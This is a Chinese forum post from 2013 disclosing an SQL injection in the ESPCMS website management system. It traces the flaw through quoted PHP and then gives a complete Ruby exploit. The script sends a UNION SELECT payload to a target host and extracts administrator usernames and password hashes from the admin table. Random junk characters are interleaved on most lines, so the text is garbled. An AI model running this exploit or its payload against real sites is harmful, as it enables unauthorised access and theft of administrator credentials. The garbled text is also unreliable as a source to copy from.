0×0 漏洞概述0×1 漏洞细节0 r8 ~+ w' U8 v8 l% i# ?
0×2 PoC& g9 o3 O1 I" Q" L0 T: T
* F# n# _5 g4 r% G8 M: y5 x) S* X5 d! o. O
) O0 `5 U' K9 t+ L% ?
0×0 漏洞概述 ^5 Q, g1 {% L3 k2 S. }' r
9 ?+ z8 W" Q2 t+ |0 R) Q( x
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。/ q7 a& ]1 v5 K
其在处理传入的参数时考虑不严谨导致SQL注入发生
: t0 K5 S6 U+ d/ U: T3 Q
" N$ ~2 s$ U' U# \4 X; k# _* ?, U* K' {. u
0×1 漏洞细节& j8 q9 S4 {% y/ I# v O* u; U
* \1 X$ F' M1 v4 o) `
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。( n& j4 D% H* C2 M* t& `6 A3 o
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。: P. A' V: v2 c) K
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
- V9 k5 |! l4 Z% d6 w
, h$ c5 P0 C/ G G% W% Y在/interface/3gwap_search.php文件的in_result函数中:
9 H( I% r$ h; b Z% d# G. J# k0 e* R I, x, @
$ z) i0 q7 T6 J( |3 E
) s% D. ]' j3 M0 a: }
function in_result() {
4 s) W2 t/ v/ r0 X, X7 R) |) G ... ... ... ... ... ... ... ... ...2 K7 E' a6 d/ }* Y& T
$urlcode = $_SERVER[ 'QUERY_STRING '];# g4 G6 G. R* v0 z$ N8 A# E
parse_str(html_entity_decode($urlcode), $output);0 ` f& w6 Y( `! v
3 P$ C' M9 A4 d2 @. @! }& J2 V
... ... ... ... ... ... ... ... ...
3 ~4 p" E" w+ y if (is_array($output['attr' ]) && count($output['attr']) > 0) {
; @: F1 Y+ b" |& ]' ^/ U- w* q0 }1 e& o! f5 F
$db_table = db_prefix . 'model_att';9 T6 J8 r6 ^ n: } {6 B( b
# H& ]; C4 l ^' x0 d foreach ($output['attr' ] as $key => $value) {9 q+ H) F& Y! B
if ($value) {5 L' ?% A! T* `0 `
8 M3 N% W% O" U1 f6 v8 r $key = addslashes($key);
' R# d3 ~% \% d* @& E- o $key = $this-> fun->inputcodetrim($key);" [, W c' e6 c* |2 b' U* E
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
4 E, V* S) v/ _4 f3 m; R2 j0 z' o $countnum = $this->db_numrows($db_table, $db_att_where);
7 S: H O4 Y* k if ($countnum > 0) {+ @' q3 q; a1 C9 }% L. P* F4 g
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
2 E- d ?# x, @ }
7 c# \7 a- u+ E3 x7 Y/ w }
' U( L4 `# s% Q \0 c0 u1 J }
8 ]% I0 ]6 u3 r5 B7 P+ r }! _" G* f/ w1 ~- w( X z& J( j
if (!empty ($keyword) && empty($keyname)) {: ~8 X' X/ H+ G! W
$keyname = 'title';
& U! v8 f& ^0 X% v $db_where.= " AND a.title like '%$keyword%'" ;
. Y- E# `/ X: n8 h" ~$ U: Y } elseif (!empty ($keyword) && !empty($keyname)) {" i& l" B. f/ r3 P1 p4 D& s" P
$db_where.= " AND $keyname like '% $keyword%'";
% h7 [* U, F# W- V1 B' l0 M" z }
( l$ c# P, s# i* O4 H $pagemax = 15;
, }1 m, @# D8 }
. T! y8 w/ |* C; J $pagesylte = 1;
% D4 ]- z- E, k# H
0 \2 K: t! O( \5 }: a$ b: P, Q9 U if ($countnum > 0) {
6 D0 ]1 v4 w( g5 l# `1 ]& B9 U) {% m: W2 `# ^6 z& f5 C# A7 [
$numpage = ceil($countnum / $pagemax);
1 k. r1 l; _/ m0 ? } else {
5 ?: m' M1 E' \: z' i) h H $numpage = 1;" L- n$ c. u8 o. m. s( N/ B
}
: l8 f$ w0 k: E. s( ? $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;6 ~& x$ u( t) Q& \6 o0 N
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);* ^, o! z5 o7 \( I# f
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);- L( {0 E. H/ m( i# v* T4 L
... ... ... ... ... ... ... ... ...7 P/ M. i% H3 r8 p3 f4 H9 ^
}3 X# Y. T+ g4 I$ U( A& [
0 f& T; p# i- G8 o9 r: w
3 c3 h3 [2 `5 a, r; Z' B0×2 PoC
& n: I5 B: D# i8 R6 F( Q/ w6 r' E2 g, }' D
; x. w6 |3 x4 e/ q$ p$ y. |8 A& j9 \+ T& o$ G% o
require "net/http"
4 s' X9 b. [! u6 R0 K
1 \/ I" [3 i+ O- d7 Rdef request(method, url)# j+ |0 Y" V2 N! N* F% H
if method.eql?("get")
/ q0 R g$ j1 @( X$ M6 M+ D uri = URI.parse(url)) Q* _$ ]+ u( J) R
http = Net::HTTP.new(uri.host, uri.port)
5 b# v3 _' T0 x$ q n! ]2 P& D response = http.request(Net::HTTP::Get.new(uri.request_uri))
# c" h. E; i3 i8 d+ V( X return response
/ @* ^/ W( a- S5 g7 p2 k8 w' c end
" S6 s- T7 o2 _$ R; Z5 u+ Dend
% J5 Z! {5 v2 d- C5 N- |( O/ \- L. {! [
doc =<<HERE# v5 ^ i2 [+ O* U" {9 B
-------------------------------------------------------; j# { E: i1 E' ~- a7 z( d; Q
Espcms Injection Exploit
0 A( t" q V' B+ y" u" vAuthor:ztz' H7 t6 v2 B% V8 |5 v; x' C/ o
Blog:http://ztz.fuzzexp.org/& ?! [& x2 V- o. c6 T( H& [
-------------------------------------------------------
/ x D! c2 w; C* A! {& d; ?5 ]3 _5 P: t6 N) ^2 g
HERE6 E" N" P; b; ?/ }8 [9 m1 J
( k- I9 s: U9 a+ `; m% }usage =<<HERE: q+ ]8 \/ J3 U1 x8 `
Usage: ruby #{$0} host port path0 r" [9 J) c5 T9 C/ l' G/ w# T2 }! \
example: ruby #{$0} www.target.com 80 /
) o9 i- M( U/ U% p" s, LHERE
% F; e! B2 a( J9 }! O3 H
/ Q7 _: R* ?4 p5 i5 Nputs doc- A* H0 R# p+ a Q+ Z
if ARGV.length < 38 t. V& }; k- ~9 G/ z
puts usage
; \, M4 V) I: M: w8 A: Q- H9 f: G1 Selse
! Z" f" _* \! U3 W- M2 C $host = ARGV[0]6 g; d- h. j8 L3 M/ h4 G1 j; x
$port = ARGV[1]
+ b- n2 d( H0 }: t+ N $path = ARGV[2]% d. @# W& H9 | m* G
' Q* d. I& w& C0 G9 u Y puts "send request..."( |) H. u' \$ z' W- Y$ T+ u5 z
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
9 a" F4 d1 a$ kattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
% t! Y* w2 _. u! c/ ]7 C K9 H,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27: |, F& p0 v8 x& | O. P U) Z {
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
$ t3 ~# K* I- }2 k+ v) D response = request("get", url)* v6 @2 W) F$ w( {" c
result = response.body.scan(/\w+&\w{32}/)
3 J, y v$ k: L) E% O( Z puts result
- M: s, D) l6 X5 ~5 Send
+ m' c: P! x' a! B# s2 v
' N) [3 P; z: P! }( a |
发表于 2013-7-27 18:31:52
收藏
支持
反对